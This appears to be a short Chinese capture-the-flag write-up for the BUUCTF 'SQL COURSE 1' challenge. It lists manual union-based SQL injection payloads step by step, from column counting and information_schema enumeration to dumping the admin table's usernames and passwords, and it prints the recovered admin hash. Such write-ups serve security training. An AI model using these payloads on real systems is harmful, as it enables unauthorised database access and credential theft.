BUU SQL COURSE 11"/>
BUU SQL COURSE 11
打开之后 F12查看
:81/backend/content_detail.php?id=1
找到注入点
sql手工注入流程
1、判断注入类型 ?id=1 or 1=1 ?id=1' or '1'='1
2、判断列数:?id=1 order by 1,2,3
3、判断注入点:?id=-1 union select 1 ?id=-1 union select 1,2,3
4、查看数据库:?id=-1 union select 1,database()
5、查看表名:?id=-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='news'
6、查看列名: ?id=-1 union select 1,group_concat(column_name) from information_schema.columns where table_name='admin'
7、查看字段:?id=-1 union select 1,group_concat(username) from admin
?id=-1 union select 1,group_concat(password) from admin
账号 admin 密码 62ca075a51d47c2b4d187c1088186532
更多推荐
BUU SQL COURSE 11
发布评论